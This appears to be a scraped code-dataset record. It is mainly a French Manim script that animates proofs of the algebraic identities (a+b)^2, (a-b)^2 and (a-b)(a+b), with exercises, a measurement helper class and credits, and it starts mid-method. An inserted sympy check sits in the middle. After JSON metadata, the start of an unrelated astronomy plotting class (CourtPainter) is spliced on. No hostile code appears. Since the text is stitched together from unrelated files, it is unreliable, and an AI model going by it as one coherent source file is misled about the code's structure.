construct(self):\r\n title = TextMobject(r\"\\underline{\\sc Preuve de IR2}\", color=BLUE).to_corner(UL).scale(1)\r\n\r\n eq_1 = TextMobject(r\"$(a-b)^{2}$\", r\" $=$\", r\" $(a+c)^{2}$\").scale(1.1)\r\n justification_1 = TextMobject(r\"(Posons $c=-b$)\").scale(0.9)\r\n eq_1.next_to([-6, 1.5, 0], RIGHT)\r\n justification_1.next_to([2.75, 1.35, 0])\r\n\r\n eq_2 = TextMobject(r\" $=$\",r\"$a^{2}+2ac+c^{2}$\").scale(1.1)\r\n justification_2 = TextMobject(r\"(Par IR1)\").scale(0.9).set_color(RED)\r\n eq_2[0].next_to(eq_1, DOWN, buff=LARGE_BUFF).align_to(eq_1[1], LEFT)\r\n eq_2[1].next_to(eq_2[0], RIGHT, buff=LARGE_BUFF).align_to(eq_1[2], LEFT)\r\n justification_2.next_to(eq_2[1], RIGHT, buff=LARGE_BUFF).align_to(justification_1, RIGHT)\r\n\r\n eq_3 = TextMobject(r\" $=$\", r\"$a^{2}+2a(-b)+(-b)^{2}$\").scale(1.1)\r\n justification_3 = TextMobject(r\"(Par définition)\").scale(0.9)\r\n eq_3[0].next_to(eq_2, DOWN, buff=LARGE_BUFF).align_to(eq_2[0], LEFT)\r\n eq_3[1].next_to(eq_3[0], RIGHT, buff=LARGE_BUFF).align_to(eq_2[1], LEFT)\r\n justification_3.next_to(eq_3[1], RIGHT, buff=LARGE_BUFF).align_to(justification_2, RIGHT)\r\n\r\n eq_4 = TextMobject(r\" $=$\", r\"$a^{2}-2ab+b^{2}$\").scale(1.1)\r\n eq_4[0].next_to(eq_3, DOWN, buff=LARGE_BUFF).align_to(eq_3[0], LEFT)\r\n eq_4[1].next_to(eq_4[0], RIGHT, buff=LARGE_BUFF).align_to(eq_3[1], LEFT)\r\n\r\n square = Square(side_length=0.25, fill_color=GOLD, fill_opacity=1, color=ORANGE)\r\n square.move_to(5 * RIGHT + 3 * DOWN)\r\n\r\n\r\n self.play(Write(title))\r\n self.wait(5)\r\n self.play(Write(eq_1))\r\n self.wait(5)\r\n self.play(Write(justification_1))\r\n self.wait(3)\r\n self.play(Write(justification_2))\r\n self.wait(5)\r\n self.play(Write(eq_2))\r\n self.wait(3)\r\n 
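# --- aside -------------------------------------------------------------------
# The three identities animated in these scenes can be machine-checked in a
# few lines (assuming sympy is installed; this is a reader's sanity check,
# not part of any Scene):
import sympy

a, b = sympy.symbols('a b')
assert sympy.expand((a + b) ** 2) == a ** 2 + 2 * a * b + b ** 2   # IR1
assert sympy.expand((a - b) ** 2) == a ** 2 - 2 * a * b + b ** 2   # IR2
assert sympy.expand((a - b) * (a + b)) == a ** 2 - b ** 2          # IR3
# --- end aside -----------------------------------------------------------------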
self.play(Write(justification_3))\r\n self.wait(5)\r\n self.play(Write(eq_3))\r\n self.wait(5)\r\n self.play(Write(eq_4))\r\n self.wait(3)\r\n self.play(Write(square))\r\n self.wait(15)\r\n\r\n\r\nclass IdRem3(Scene):\r\n def construct(self):\r\n title = TextMobject(r\"\\underline{\\sc Preuve de IR3:}\", color=YELLOW).to_corner(UL).scale(1)\r\n\r\n eq_1 = TextMobject(r\"$(a-b)(a+b)$\", r\" $=$\", r\" $a^{2}+ab-ba-b^{2}$\").scale(1.1)\r\n justification_1 = TextMobject(r\"(Distributivité)\").scale(0.8)\r\n eq_1.next_to([-6, 1.5, 0], RIGHT)\r\n justification_1.next_to([2.75, 1.35, 0])\r\n\r\n eq_2 = TextMobject(r\" $=$ \", r\"$a^{2}$\", r\" $+$ \", r\"$(ab$\", r\" $-$ \", r\"$ab)$\", r\" $-$ \", r\"$b^{2}$\").scale(1.1)\r\n justification_2 = TextMobject(r\"(Commutativité)\").scale(0.8)\r\n eq_2.next_to([-2.6,0,0])\r\n justification_2.next_to(eq_2[1], RIGHT, buff=LARGE_BUFF).align_to(justification_1, RIGHT)\r\n\r\n cancel_ab = Cancel(eq_2[0])\r\n\r\n eq_3 = TextMobject(r\" $=$\", r\"$a^{2}-b^{2}$\").scale(1.1)\r\n eq_3[0].next_to(eq_2, DOWN, buff=LARGE_BUFF).align_to(eq_2[0], LEFT)\r\n eq_3[1].next_to(eq_3[0], RIGHT, buff=LARGE_BUFF).align_to(eq_2[1], LEFT)\r\n\r\n square = Square(side_length=0.25, fill_color=GOLD, fill_opacity=1, color=ORANGE)\r\n square.move_to(5 * RIGHT + 3 * DOWN)\r\n\r\n\r\n self.play(Write(title))\r\n self.wait(5)\r\n self.play(Write(eq_1))\r\n self.wait(5)\r\n #self.play(Write(justification_1))\r\n self.play(Write(eq_2))\r\n self.wait(5)\r\n self.add(eq_2, cancel_ab)\r\n self.wait(5)\r\n #self.play(Write(justification_2))\r\n self.play(Write(eq_3))\r\n self.wait(5)\r\n self.play(Write(square))\r\n self.wait(15)\r\n\r\n\r\n\r\nclass MeasuredIdentity(Scene):\r\n CONFIG = {\r\n \"color_triangle\": YELLOW,\r\n \"color_rect_c\": RED,\r\n \"color_rect_b\": PURPLE,\r\n \"color_rect_a\": BLUE,\r\n \"color_square_c\": ORANGE,\r\n \"opacity_triangles\": 0.6,\r\n \"opacity_square_a\": 0.6,\r\n \"opacity_square_b\": 0.6,\r\n \"opacity_square_c\": 0.6,\r\n \"line_width\": 1,\r\n \"l_a\": 5 / 5,\r\n \"l_b\": 12 / 5,\r\n \"l_c\": 13 / 5,\r\n }\r\n\r\n def construct(self):\r\n self.wait(3)\r\n self.pre_square()\r\n self.wait(10)\r\n self.pos_square()\r\n self.transition_squares()\r\n\r\n def pre_square(self):\r\n square = Square(side_length=self.l_a + self.l_b, fill_opacity=0.5, color=ORANGE)\r\n drawed_coords = []\r\n for point in [DL, DR, UL, UR]:\r\n drawed_coords.append(square.get_corner(point))\r\n dl, dr, ul, ur = drawed_coords\r\n\r\n coords_sides = []\r\n for point in [dr + LEFT * self.l_b, dl + UP * self.l_a, ul + RIGHT * self.l_a, ur + DOWN * self.l_b]:\r\n coords_sides.append(point)\r\n lin, liz, ls, ld = coords_sides\r\n\r\n vert_measure = MeasureDistance(Line(dl, dr), invertir=True, dashed=True, buff=-0.25).add_tips()\\\r\n .add_tex(\"a+b\", buff=-3.7, color=WHITE)\r\n hor_measure = MeasureDistance(Line(dl, ul), invertir=False, dashed=True, buff=0.5).add_tips()\\\r\n .add_tex(\"a+b\", buff=2, color=WHITE)\r\n measures_1 = VGroup(hor_measure, vert_measure)\r\n\r\n\r\n title = TextMobject(r\"\\sc Preuve (géométrique): \", color=WHITE).to_corner(UL)\r\n self.title = VGroup(title)\r\n self.play(Write(title, run_time=1), ShowCreation(square, run_time=1),\r\n *[GrowFromCenter(object) for object in [*measures_1]], run_time=1\r\n )\r\n\r\n joint_pre_square = VGroup(square)\r\n self.joint_pre_square = square\r\n self.joint_pre_square.add(hor_measure, vert_measure)\r\n self.play(joint_pre_square.to_edge, LEFT, {\"buff\": 1.7})\r\n self.square = square\r\n\r\n\r\n def 
pos_square(self):\r\n\r\n square = Square(side_length=self.l_a + self.l_b)\r\n drawed_coords = []\r\n for point in [DL, DR, UL, UR]:\r\n drawed_coords.append(square.get_corner(point))\r\n dl, dr, ul, ur = drawed_coords\r\n\r\n\r\n coords_sides = []\r\n for point in [dr + LEFT * self.l_b, dl + UP * self.l_a, ul + RIGHT * self.l_a, ur + DOWN * self.l_b]:\r\n coords_sides.append(point)\r\n lin, liz, ls, ld = coords_sides\r\n center_point = lin + UP * self.l_a\r\n\r\n\r\n rectangles = []\r\n rectangles_coords = [(ld, dr, lin, center_point), (lin, dl, liz, center_point), (liz, ul, ls, center_point),\r\n (ls, ur, ld, center_point)]\r\n rectangles_colors = [GREEN, PURPLE, GREEN, BLUE]\r\n for rectangle_coords, rectangle_color in zip(rectangles_coords, rectangles_colors):\r\n rectangle = Polygon(rectangle_coords[0], rectangle_coords[1], rectangle_coords[2], rectangle_coords[3],\r\n color=WHITE).set_fill(rectangle_color, self.opacity_triangles) \\\r\n .set_stroke(None, self.line_width)\r\n rectangles.append(rectangle)\r\n\r\n\r\n hor_measure_a = MeasureDistance(Line(dl, lin), invertir=True, dashed=True, buff=-0.25).add_tips() \\\r\n .add_tex(\"a\", buff=-3.7, color=WHITE)\r\n hor_measure_b = MeasureDistance(Line(lin, dr), invertir=True, dashed=True, buff=-0.25).add_tips() \\\r\n .add_tex(\"b\", buff=-2.7, color=WHITE)\r\n vert_measure_b = MeasureDistance(Line(dl, liz), invertir=False, dashed=True, buff=0.5).add_tips() \\\r\n .add_tex(\"a\", buff=2, color=WHITE)\r\n vert_measure_a = MeasureDistance(Line(liz, ul), invertir=False, dashed=True, buff=0.5).add_tips() \\\r\n .add_tex(\"b\", buff=1, color=WHITE)\r\n vert_measure_a[-1].rotate(-PI / 2)\r\n vert_measure_b[-1].rotate(-PI / 2)\r\n measures_2 = VGroup(hor_measure_a, hor_measure_b, vert_measure_a, vert_measure_b)\r\n\r\n joint_pos_squares = VGroup(square, *rectangles, measures_2)\r\n joint_pos_squares.to_edge(RIGHT, buff=1.7)\r\n self.joint_pos_squares = joint_pos_squares\r\n\r\n self.measures_2 = measures_2\r\n\r\n self.rectangles = rectangles\r\n self.rect_ba = rectangles[0]\r\n self.square_a2 = rectangles[1]\r\n self.rect_ab = rectangles[2]\r\n self.square_b2 = rectangles[3]\r\n\r\n\r\n\r\n def transition_squares(self):\r\n\r\n self.play(*[GrowFromCenter(object) for object in [*self.measures_2]], run_time=1)\r\n self.play(DrawBorderThenFill(self.square_a2), DrawBorderThenFill(self.square_b2),\r\n DrawBorderThenFill(self.rect_ba), DrawBorderThenFill(self.rect_ab),\r\n run_time=1)\r\n\r\n self.wait(15)\r\n #t_ab2 = TexMobject(\"(a+b)^2\", color=WHITE).move_to(self.square)\r\n t_ab2 = TexMobject(\"(a+b)^2\", color=WHITE).next_to(np.array([-3.5,0,0]))\r\n t_a2 = TexMobject(\"a^2\", color=WHITE).move_to(self.square_a2)\r\n t_b2 = TexMobject(\"b^2\", color=WHITE).move_to(self.square_b2)\r\n t_ab = TexMobject(\"ab\", color=WHITE).move_to(self.rect_ab)\r\n t_ba = TexMobject(\"ba\", color=WHITE).move_to(self.rect_ba)\r\n\r\n\r\n self.play(*[Write(t_) for t_ in [t_ab2, t_a2, t_b2, t_ab, t_ba]])\r\n\r\n theorem = TexMobject(\"(a+b)^2\", \"=\", \"a^2\", \"+\", \"b^2\", \"+\", \"2ab\").to_edge(DOWN)\r\n [theorem[2 * i].set_color(theorem_color) for i, theorem_color in enumerate([ORANGE, PURPLE, BLUE, GREEN])]\r\n self.play(\r\n *[ReplacementTransform(\r\n t_.copy()[:], r_\r\n ) for t_, r_ in zip([t_ab2, t_a2, t_b2, t_ab, t_ba],\r\n [theorem[0], theorem[2], theorem[4], theorem[6], theorem[6]])],\r\n Write(theorem[1]), Write(theorem[3]), Write(theorem[5]), run_time=2.5\r\n )\r\n self.wait(10)\r\n #self.play(\r\n # self.title.shift, UP * 3,\r\n # 
theorem.shift, DOWN * 3,\r\n # t_ab2.shift, LEFT * 7,\r\n # self.joint_pre_square.shift, LEFT * 7,\r\n # VGroup(t_a2, t_b2, t_ab, t_ba).shift, RIGHT * 7,\r\n # VGroup(*self.rectangles).shift, RIGHT * 7,\r\n # self.measures_2.shift, RIGHT * 7\r\n #)\r\n\r\n\r\n\r\nclass Ab_sqrt_proof(Scene):\r\n CONFIG = {\r\n \"square_scale\": 2,\r\n \"squares_colors\": [WHITE, YELLOW]\r\n }\r\n def construct(self):\r\n\r\n # Define two squares (one yellow and one white, opacity allows to fill color in figure).\r\n left_square, right_square = Square(fill_opacity=0.5, color=ORANGE), Square()\r\n\r\n # Put the two squares next to another.\r\n VGroup(left_square, right_square)\\\r\n .scale(self.square_scale)\\\r\n .arrange_submobjects(RIGHT,buff=2)\r\n\r\n\r\n # RIGHT SQUARE SETTINGS\r\n ## Configure dots to draw triangles inside right square.\r\n dots2 = [right_square.point_from_proportion(i * 1 / 4 + j * 1 / 16) for i, j in zip(range(4), [1, 3, 3, 1])]\r\n dots_corners2 = [right_square.point_from_proportion(i * 1 / 4) for i in range(4)]\r\n middle = np.array([dots2[0][0], dots2[1][1], 0])\r\n\r\n\r\n def get_color(i):\r\n if i == 0 or i == 2:\r\n return GREEN\r\n elif i == 1:\r\n return BLUE\r\n else:\r\n return PURPLE\r\n\r\n\r\n # Generate the rectangles and squares in which to place the triangles.\r\n all_rectangles = VGroup(*[Polygon(dots_corners2[i], dots2[i], middle, dots2[i - 1],\r\n fill_opacity=0.7, color=get_color(i)) for i in range(4)])\r\n rectangles = all_rectangles[0::2] # Rectangles: rectangles of the triangles\r\n squares = all_rectangles[1::2] # Big and small squares\r\n\r\n # Generate the title\r\n Title = TextMobject(r\"\\underline{Preuve (géométrique):}\")\r\n Title.to_edge(UP + LEFT)\r\n\r\n # Latex formula (located at the bottom of screen).\r\n theorem_colors = [ORANGE, BLUE, PURPLE, GREEN]\r\n theorem = TexMobject(\"(a+b)^2\", \"=\", \"a^2\", \"+\", \"b^2\", \"+\", \"2ab\").to_edge(DOWN)\r\n [theorem[2*i].set_color(theorem_color) for i, theorem_color in enumerate(theorem_colors)]\r\n\r\n # Create tex formula expressions to the new locations (in the Figure (for visualization))\r\n parts_theorem = VGroup(\r\n TexMobject(\"(a+b)^2\").move_to(left_square),\r\n TexMobject(\"a^2\").move_to(squares[0]),\r\n TexMobject(\"b^2\").move_to(squares[1]),\r\n TexMobject(\"ab\").move_to(rectangles[0]),\r\n TexMobject(\"ba\").move_to(rectangles[1])\r\n )\r\n\r\n # Display title\r\n self.play(Write(Title))\r\n\r\n # Draw borders of the squares and fill them (if opacity is defined).\r\n self.play(*list(map(DrawBorderThenFill, [left_square, right_square])))\r\n\r\n # Display the left square, the small right squares and the expressions of the theorem (in small squares).\r\n self.play(ShowCreation(squares), ShowCreation(rectangles), Write(parts_theorem))\r\n\r\n # Replace the elements of the bottom formula by the colored one associated to the figure.\r\n self.play(*[ReplacementTransform(t_.copy()[:], r_, run_time=4)\r\n for t_, r_ in zip(parts_theorem, [theorem[0], theorem[2], theorem[4], theorem[6], theorem[6]])],\r\n Write(theorem[1]), Write(theorem[3]), Write(theorem[5])\r\n )\r\n self.wait(3)\r\n\r\n\r\nclass Exercises1(Scene):\r\n CONFIG = {\r\n \"square_scale\": 1,\r\n \"squares_colors\": [WHITE, YELLOW]\r\n }\r\n # TO-DO :\r\n # Time limit. 
Find the answers.\r\n # Put the solution on both sides.\r\n def construct(self):\r\n title = TextMobject(r\"\\underline{\\sc Exercices supplémentaires}\").to_corner(UL).set_color(PURPLE).scale(1.15)\r\n exos = TextMobject(r\" Factoriser les expressions suivantes à l'aide des identités remarquables:\",\r\n r\"\"\"\r\n \\begin{enumerate}\r\n \\item $a-2\\sqrt{a}\\sqrt{b}+b$,\r\n \\item $16y^{2}-4x^{2}$.\r\n \\end{enumerate}\r\n \"\"\")\r\n #definition.scale(0.7)\r\n exos[0].move_to(np.array([-0.75, 2, 0]))\r\n exos.scale(0.8)\r\n\r\n\r\n self.play(Write(title))\r\n self.wait(10)\r\n self.play(FadeIn(exos))\r\n self.wait(5)\r\n\r\n # Pause to think about it.\r\n circ = Arc(start_angle=PI / 2, angle=-2 * PI, radius=0.35).to_corner(DL)\r\n timers = [TexMobject(str(i)).move_to(circ) for i in range(5, -1, -1)]\r\n pause = TextMobject(\"Faites pause et trouvez les solutions.\").next_to(circ, RIGHT)\r\n self.play(ShowCreation(circ), Write(pause))\r\n self.play(Write(timers[0]), run_time=0.5)\r\n for i in range(5):\r\n self.play(ReplacementTransform(timers[i], timers[i + 1]), run_time=0.5)\r\n self.wait(0.5)\r\n self.play(FadeOut(pause), FadeOut(timers[-1]), FadeOut(circ), run_time=2)\r\n\r\n answer = TextMobject(\"Solutions (respectivement): $(\\sqrt{a}-\\sqrt{b})^{2}$, $(4y-2x)(4y+2x)$\").to_corner(DL)\r\n self.play(Write(answer))\r\n self.wait(10)\r\n self.play(FadeOut(exos))\r\n self.play(FadeOut(title))\r\n\r\n\r\n\r\n\r\nclass MeasureObject1(Scene):\r\n def construct(self):\r\n square=Square()\r\n measure_line=Line(square.get_corner(DL),square.get_corner(UL))\r\n # MeasureDistance: my_objects.py - line 143\r\n measure=MeasureDistance(measure_line).add_tips()\r\n measure_tex=measure.get_tex(\"x\")\r\n self.add(square,measure,measure_tex)\r\n self.wait(2)\r\n\r\n\r\nclass MeasureDistance(VGroup):\r\n CONFIG = {\r\n \"color\": RED_B,\r\n \"buff\": 0.3,\r\n \"lateral\": 0.3,\r\n \"invert\": False,\r\n \"dashed_segment_length\": 0.09,\r\n \"dashed\": True,\r\n \"ang_arrows\": 30 * DEGREES,\r\n \"size_arrows\": 0.2,\r\n \"stroke\": 2.4,\r\n }\r\n\r\n def __init__(self, mob, **kwargs):\r\n VGroup.__init__(self, **kwargs)\r\n if self.dashed == True:\r\n medicion = DashedLine(ORIGIN, mob.get_length() * RIGHT,\r\n dashed_segment_length=self.dashed_segment_length).set_color(self.color)\r\n else:\r\n medicion = Line(ORIGIN, mob.get_length() * RIGHT)\r\n\r\n medicion.set_stroke(None, self.stroke)\r\n\r\n pre_medicion = Line(ORIGIN, self.lateral * RIGHT).rotate(PI / 2).set_stroke(None, self.stroke)\r\n pos_medicion = pre_medicion.copy()\r\n\r\n pre_medicion.move_to(medicion.get_start())\r\n pos_medicion.move_to(medicion.get_end())\r\n\r\n angulo = mob.get_angle()\r\n matriz_rotacion = rotation_matrix(PI / 2, OUT)\r\n vector_unitario = mob.get_unit_vector()\r\n direccion = np.matmul(matriz_rotacion, vector_unitario)\r\n self.direccion = direccion\r\n\r\n self.add(medicion, pre_medicion, pos_medicion)\r\n self.rotate(angulo)\r\n self.move_to(mob)\r\n\r\n if self.invert == True:\r\n self.shift(-direccion * self.buff)\r\n else:\r\n self.shift(direccion * self.buff)\r\n self.set_color(self.color)\r\n self.tip_point_index = -np.argmin(self.get_all_points()[-1, :])\r\n\r\n def add_tips(self):\r\n linea_referencia = Line(self[0][0].get_start(), self[0][-1].get_end())\r\n vector_unitario = linea_referencia.get_unit_vector()\r\n\r\n punto_final1 = self[0][-1].get_end()\r\n punto_inicial1 = punto_final1 - vector_unitario * self.size_arrows\r\n\r\n punto_inicial2 = self[0][0].get_start()\r\n punto_final2 = 
punto_inicial2 + vector_unitario * self.size_arrows\r\n\r\n lin1_1 = Line(punto_inicial1, punto_final1).set_color(self[0].get_color()).set_stroke(None, self.stroke)\r\n lin1_2 = lin1_1.copy()\r\n lin2_1 = Line(punto_inicial2, punto_final2).set_color(self[0].get_color()).set_stroke(None, self.stroke)\r\n lin2_2 = lin2_1.copy()\r\n\r\n lin1_1.rotate(self.ang_arrows, about_point=punto_final1, about_edge=punto_final1)\r\n lin1_2.rotate(-self.ang_arrows, about_point=punto_final1, about_edge=punto_final1)\r\n\r\n lin2_1.rotate(self.ang_arrows, about_point=punto_inicial2, about_edge=punto_inicial2)\r\n lin2_2.rotate(-self.ang_arrows, about_point=punto_inicial2, about_edge=punto_inicial2)\r\n\r\n return self.add(lin1_1, lin1_2, lin2_1, lin2_2)\r\n\r\n def add_tex(self, text, scale=1, buff=-1, **moreargs):\r\n linea_referencia = Line(self[0][0].get_start(), self[0][-1].get_end())\r\n texto = TexMobject(text, **moreargs)\r\n ancho = texto.get_height() / 2\r\n texto.rotate(linea_referencia.get_angle()).scale(scale).move_to(self)\r\n texto.shift(self.direccion * (buff + 1) * ancho)\r\n return self.add(texto)\r\n\r\n def add_text(self, text, scale=1, buff=0.1, **moreargs):\r\n linea_referencia = Line(self[0][0].get_start(), self[0][-1].get_end())\r\n texto = TextMobject(text, **moreargs)\r\n ancho = texto.get_height() / 2\r\n texto.rotate(linea_referencia.get_angle()).scale(scale).move_to(self)\r\n texto.shift(self.direccion * (buff + 1) * ancho)\r\n return self.add(texto)\r\n\r\n def add_size(self, text, scale=1, buff=0.1, **moreargs):\r\n linea_referencia = Line(self[0][0].get_start(), self[0][-1].get_end())\r\n texto = TextMobject(text, **moreargs)\r\n ancho = texto.get_height() / 2\r\n texto.rotate(linea_referencia.get_angle())\r\n texto.shift(self.direccion * (buff + 1) * ancho)\r\n return self.add(texto)\r\n\r\n def add_letter(self, text, scale=1, buff=0.1, **moreargs):\r\n linea_referencia = Line(self[0][0].get_start(), self[0][-1].get_end())\r\n texto = TexMobject(text, **moreargs).scale(scale).move_to(self)\r\n ancho = texto.get_height() / 2\r\n texto.shift(self.direccion * (buff + 1) * ancho)\r\n return self.add(texto)\r\n\r\n def get_text(self, text, scale=1, buff=0.1, invert_dir=False, invert_texto=False, remove_rot=False, **moreargs):\r\n linea_referencia = Line(self[0][0].get_start(), self[0][-1].get_end())\r\n texto = TextMobject(text, **moreargs)\r\n ancho = texto.get_height() / 2\r\n if invert_texto:\r\n inv = PI\r\n else:\r\n inv = 0\r\n if remove_rot:\r\n texto.scale(scale).move_to(self)\r\n else:\r\n texto.rotate(linea_referencia.get_angle()).scale(scale).move_to(self)\r\n texto.rotate(inv)\r\n if invert_dir:\r\n inv = -1\r\n else:\r\n inv = 1\r\n texto.shift(self.direccion * (buff + 1) * ancho * inv)\r\n return texto\r\n\r\n def get_tex(self, tex, scale=1, buff=1, invert_dir=False, invert_texto=False, remove_rot=True, **moreargs):\r\n linea_referencia = Line(self[0][0].get_start(), self[0][-1].get_end())\r\n texto = TexMobject(tex, **moreargs)\r\n ancho = texto.get_height() / 2\r\n if invert_texto:\r\n inv = PI\r\n else:\r\n inv = 0\r\n if remove_rot:\r\n texto.scale(scale).move_to(self)\r\n else:\r\n texto.rotate(linea_referencia.get_angle()).scale(scale).move_to(self)\r\n texto.rotate(inv)\r\n if invert_dir:\r\n inv = -1\r\n else:\r\n inv = 1\r\n texto.shift(self.direccion * (buff + 1) * ancho)\r\n return texto\r\n\r\n\r\n\r\nclass Cancel(VGroup):\r\n CONFIG = {\r\n \"line_kwargs\": {\"color\":RED},\r\n \"buff_text\": None,\r\n \"buff_line\": 0.9,\r\n }\r\n def 
__init__(self,text,**kwargs):\r\n digest_config(self,kwargs)\r\n VGroup.__init__(self,**kwargs)\r\n\r\n pre_coord_dl = text.get_corner(DL)\r\n pre_coord_ur = text.get_corner(UR)\r\n reference_line = Line(pre_coord_dl,pre_coord_ur)\r\n reference_unit_vector = reference_line.get_unit_vector()\r\n coord_dl = text.get_corner(DL) - text.get_center() - reference_unit_vector*self.buff_line\r\n coord_ur = text.get_corner(UR) - text.get_center() + reference_unit_vector*self.buff_line\r\n\r\n line = Line(coord_dl+np.array([0.65,0,0]), coord_ur+np.array([0.65,0,0]),**self.line_kwargs)\r\n self.add(line)\r\n\r\n\r\nclass CancelTerms(Scene):\r\n def construct(self):\r\n formula = TexMobject(\"f(x)\",height=1)\r\n cancel_formula = Cancel(formula)\r\n self.play(Write(formula),Write(cancel_formula))\r\n\r\n\r\nclass CreditsFr(Scene):\r\n def wplay(self, *args, wait=1, run_time=1, rate_func=smooth):\r\n self.play(*args, run_time=run_time, rate_func=rate_func)\r\n if wait != 0:\r\n self.wait(wait)\r\n\r\n def construct(self):\r\n credits = TextMobject(\"Crédits\").set_color(YELLOW).scale(1.7)\r\n thanks = TextMobject(\"Merci pour votre visionnement!!\").set_color(ORANGE).scale(1.7)\r\n\r\n instructor = TexMobject(r\"\\text{Enseignant}\", r\"\\text{Louis-Marc Mercier}\")\r\n viewer = TexMobject(r\"\\text{Spectateur}\", r\"\\text{Vous}\")\r\n chanson = TexMobject(r\"\\text{Chanson (artiste)}\", r\"\\text{Prophecy (Adrian von Ziegler)}\")\r\n lines = [instructor, viewer, chanson]\r\n\r\n instructor[0].align_to([-1, 0, 0], RIGHT).shift(8 * DOWN)\r\n instructor[1].align_to([0, 0, 0], LEFT).shift(8 * DOWN)\r\n\r\n viewer[0].next_to(instructor, DOWN, buff=LARGE_BUFF).align_to(instructor[0], RIGHT)\r\n viewer[1].next_to(instructor, DOWN, buff=LARGE_BUFF).align_to(instructor[1], LEFT)\r\n\r\n chanson[0].next_to(viewer, DOWN, buff=LARGE_BUFF).align_to(viewer[0], RIGHT)\r\n chanson[1].next_to(viewer, DOWN, buff=LARGE_BUFF).align_to(viewer[1], LEFT)\r\n\r\n\r\n credits.set_y(instructor.get_top()[1] + 2 * LARGE_BUFF)\r\n thanks.set_y(-14.5)\r\n\r\n def half_start(t):\r\n # this rate function is great for gradually starting into a `linear` rate\r\n # it goes from 0 to 0.5 in value, and from 0 to 1 in slope (speed)\r\n return 1 / 2 * t ** 2\r\n\r\n everything_no_thanks = VGroup(credits, *lines)\r\n\r\n self.play(VGroup(*everything_no_thanks, thanks).shift, UP, rate_func=half_start)\r\n self.play(VGroup(*everything_no_thanks, thanks).shift, 14 * UP, rate_func=linear, run_time=14)\r\n self.play(everything_no_thanks.shift, 3 * UP, rate_func=linear, run_time=3)\r\n self.remove(*everything_no_thanks)\r\n self.wait(3)\r\n\r\n # all done :)\r\n self.wplay(FadeOut(thanks))\r\n\r\n\r\n\r\nclass CreditsEng(Scene):\r\n def wplay(self, *args, wait=1, run_time=1, rate_func=smooth):\r\n self.play(*args, run_time=run_time, rate_func=rate_func)\r\n if wait != 0:\r\n self.wait(wait)\r\n\r\n def construct(self):\r\n credits = TextMobject(\"Credits\").set_color(YELLOW).scale(1.7)\r\n thanks = TextMobject(\"Thanks for watching!!\").set_color(ORANGE).scale(1.7)\r\n\r\n instructor = TexMobject(r\"\\text{Teacher}\", r\"\\text{Louis-Marc Mercier}\")\r\n viewer = TexMobject(r\"\\text{Viewer}\", r\"\\text{You}\")\r\n chanson = TexMobject(r\"\\text{Song (artist)}\", r\"\\text{Prophecy (Adrian von Ziegler)}\")\r\n lines = [instructor, viewer, chanson]\r\n\r\n instructor[0].align_to([-1, 0, 0], RIGHT).shift(8 * DOWN)\r\n instructor[1].align_to([0, 0, 0], LEFT).shift(8 * DOWN)\r\n\r\n viewer[0].next_to(instructor, DOWN, 
buff=LARGE_BUFF).align_to(instructor[0], RIGHT)\r\n viewer[1].next_to(instructor, DOWN, buff=LARGE_BUFF).align_to(instructor[1], LEFT)\r\n\r\n chanson[0].next_to(viewer, DOWN, buff=LARGE_BUFF).align_to(viewer[0], RIGHT)\r\n chanson[1].next_to(viewer, DOWN, buff=LARGE_BUFF).align_to(viewer[1], LEFT)\r\n\r\n\r\n credits.set_y(instructor.get_top()[1] + 2 * LARGE_BUFF)\r\n thanks.set_y(-14.5)\r\n\r\n def half_start(t):\r\n # this rate function is great for gradually starting into a `linear` rate\r\n # it goes from 0 to 0.5 in value, and from 0 to 1 in slope (speed)\r\n return 1 / 2 * t ** 2\r\n\r\n everything_no_thanks = VGroup(credits, *lines)\r\n\r\n self.play(VGroup(*everything_no_thanks, thanks).shift, UP, rate_func=half_start)\r\n self.play(VGroup(*everything_no_thanks, thanks).shift, 14 * UP, rate_func=linear, run_time=14)\r\n self.play(everything_no_thanks.shift, 3 * UP, rate_func=linear, run_time=3)\r\n self.remove(*everything_no_thanks)\r\n self.wait(3)\r\n\r\n # all done :)\r\n self.wplay(FadeOut(thanks))\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass NumberedList(BulletedList):\r\n CONFIG = {\r\n \"dot_scale_factor\": 1,\r\n \"num_color\": BLUE,\r\n }\r\n\r\n def __init__(self, *items, **kwargs):\r\n line_separated_items = [s + \"\\\\\\\\\" for s in items]\r\n TextMobject.__init__(self, *line_separated_items, **kwargs)\r\n\r\n","sub_path":"id_rem_french.py","file_name":"id_rem_french.py","file_ext":"py","file_size_in_byte":32330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"547960316","text":"from __future__ import division, print_function\n\nimport copy\nimport os\nfrom decimal import Decimal # histograms\n\nimport matplotlib.gridspec as gridspec\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport scipy as sp\nfrom scipy.stats import norm\nfrom tqdm import tqdm\n\nimport corner\nimport emperors_library as emplib\nimport emperors_mirror as empmir\n\n\nclass CourtPainter:\n\n markers = ['o', 'v', '^', '>', '<', '8', 's', 'p', 'H', 'D', '*', 'd']\n error_kwargs = {'lw': 1.75, 'zorder': 0}\n chain_titles = sp.array(\n [\n 'Period', 'Amplitude', 'Phase', 'Eccentricity', 'Longitude',\n 'Acceleration', 'Jitter', 'Offset'\n ]\n )\n chain_units = [\n ' [Days]', r' $[\\frac{m}{s}]$', r' $[rad]$', '', r' $[rad]$',\n r' $[\\frac{m}{s^2}]$'\n ]\n\n def __init__(self, setup, kplanets, working_dir, pdf, png):\n self.ntemps, self.nwalkers, self.nsteps = setup\n self.kplanets = kplanets\n self.working_dir = working_dir\n self.pdf = pdf\n self.png = png\n\n if self.pdf:\n print('\\n\\t\\tWARNING: pdf output might be slow for long chains.')\n\n # Read chains, posteriors and data for plotting.\n self.chains = emplib.read_chains(working_dir + 'chains.pkl')\n self.cold = self.chains[0]\n self.posteriors = emplib.read_posteriors(\n working_dir + 'posteriors.pkl')\n self.all_rv = emplib.read_rv_data(working_dir + 'rv_data.pkl')\n self.time, self.rv, self.err, self.ins = self.all_rv\n\n self.nins = len(sp.unique(self.ins))\n self.ndim = 1 + 5 * kplanets + self.nins * 2\n\n self.__clean_rvs()\n # Setup plots.\n self.__read_config()\n self.time_cb = copy.deepcopy(self.time) - 2450000\n\n # Create directories.\n dirs = ['chains', 'posteriors', 'histograms', 'corners']\n print('\\n\\t\\tCREATING SHOWROOMS.')\n for d in dirs:\n path = self.working_dir + d\n try:\n os.mkdir(path)\n except OSError:\n print(\"Creation of the showroom %s failed\" % path)\n else:\n print(\"Successfully created the showroom %s \" % path)\n pass\n\n def 
